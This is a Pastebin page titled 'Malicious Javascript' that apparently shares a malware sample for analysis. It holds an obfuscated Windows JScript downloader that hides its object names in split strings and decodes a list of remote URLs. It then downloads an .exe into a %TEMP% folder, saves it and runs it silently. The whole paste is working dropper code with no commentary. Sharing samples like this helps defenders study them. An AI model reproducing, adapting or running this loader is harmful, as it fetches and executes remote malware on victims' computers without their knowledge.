dynamoo

Malicious Javascript

Feb 29th, 2016
234
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2.  
  3. function PnENwlyvJ(vHjcaOQlznv) {
  4. var NphasvLL = WScript.CreateObject("Wscript.Shell");
  5. NphasvLL.Run(vHjcaOQlznv, 0x1, 0x0);
  6. }
  7. function HOpGucZue(WeMHq,Bvmzy,woTkH) {
  8. var kqMgQ = "jZQvsR MHu pt.Shell nutmHCF Scri".split(" ");
  9. var kYZ=((1)?"W" + kqMgQ[4]:"")+kqMgQ[2];
  10. var oI = WScript.CreateObject(kYZ);
  11. var zK = "%TEMP%\\";
  12. return oI.ExpandEnvironmentStrings(zK);
  13. }
  14. function mfPDpXYb() {
  15. var PiRQwTc = "ipting";
  16. var EPfJUumpGx = "ile";
  17. var sUKZH = "System";
  18. return "Sc" + "r" + PiRQwTc + ".F" + EPfJUumpGx + sUKZH + "Obj" + "ect";
  19. }
  20. function MMOt(EXjbN) {
  21. return WScript.CreateObject(EXjbN);
  22. }
  23. function NIwF(BsRNx,OGReG) {
  24. BsRNx.write(OGReG);
  25. }
  26. function AJsz(gaXUm) {
  27. gaXUm.open();
  28. }
  29. function AYMy(nklNg,sCjDD) {
  30. nklNg.saveToFile(sCjDD,542-540);
  31. }
  32. function vOjl(FPpRI,UoIZQ,MXtkg) {
  33. FPpRI.open(MXtkg,UoIZQ,false);
  34. }
  35. function CgWa(JfBRD) {
  36. if (JfBRD == 864-664){return true;} else {return false;}
  37. }
  38. function HlTW(EoAPD) {
  39. if (EoAPD > 176425-148){return true;} else {return false;}
  40. }
  41. function NMLT(UHZEQ) {
  42. var TKMXZ="";
  43. for(x=(153-153); x < UHZEQ.length; x++)
  44. if (x % (849-847) != (256-256)) {
  45. TKMXZ += UHZEQ.substr(x, 241-240);
  46. }
  47. return TKMXZ;
  48. }
  49. function oVGt(bXoBQ) {
  50. bXoBQ.send();
  51. }
  52. function lQWj(BoMrR) {
  53. return BoMrR.status;
  54. }
  55. var Yo="yhGeelDlQoDyXu9nGgWm1eLnTqRqm.ecFoems/D6l98.7esxAe9?F Lo1hNihyVobudnQgYbcuNyhfGfZ.LcGo8mH/T6i9o.teVxceS?u Y?A J?U v?";
  56. var c = NMLT(Yo).split(" ");
  57. var LrW = HOpGucZue("hqwL","dwqHr","hgrELU");
  58. var auz = new ActiveXObject(mfPDpXYb());
  59. var boAJ = LrW+"elbCzuv\\";
  60. try{
  61. auz.CreateFolder(boAJ);
  62. }catch(QaqnaZ){
  63. };
  64. var yng = "2.XMLH";
  65. var rKV = (yng + "TTP" + " KopxpjI YNeoY XML ream St sPdOQrOb AD rzIcuTc OD").split(" ");
  66. var sp = true  , RZce = rKV[7] + "" + rKV[9];
  67. var mL = MMOt("MS"+rKV[3]+(306427, rKV[0]));
  68. var Wub = MMOt(RZce + "B." + rKV[5]+(825927, rKV[4]));
  69. var KbI = 0;
  70. var i = 1;
  71. var dTtgsXS = 912892;
  72. var h=KbI;
  73. while (true)  {
  74. if(h>=c.length) {break;}
  75. var Wt = 0;
  76. var MQv = ("ht" + " DOFHPHM tp whdfV gambqeDe :// bXPmNZP .exe  GET").split(" ");
  77. try  {
  78. vOjl(mL,MQv[0]+MQv[2]+MQv[5]+c[h]+i, "GET"); oVGt(mL); if (CgWa(lQWj(mL)))  {      
  79. AJsz(Wub); Wub.type = 1; NIwF(Wub,mL.responseBody); if (HlTW(Wub.size))  {
  80. Wt = 1; Wub.position = 0; AYMy(Wub,/*qWMW72LFKl*/boAJ/*gr7c91tcbM*/+dTtgsXS+MQv[7]); try  {
  81. if (((new Date())>0,7448464888)) {
  82. PnENwlyvJ(boAJ+dTtgsXS+/*C8KP47dYcj*/MQv[7]/*kGIG32ZLIA*/);
  83. break;
  84. }
  85. }
  86. catch (ra)  {
  87. };
  88. }; Wub.close();
  89. };
  90. if (Wt == 1)  {
  91. KbI = h; break;
  92. };
  93. }
  94. catch (ra)  {
  95. };
  96. h++;
  97. };
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×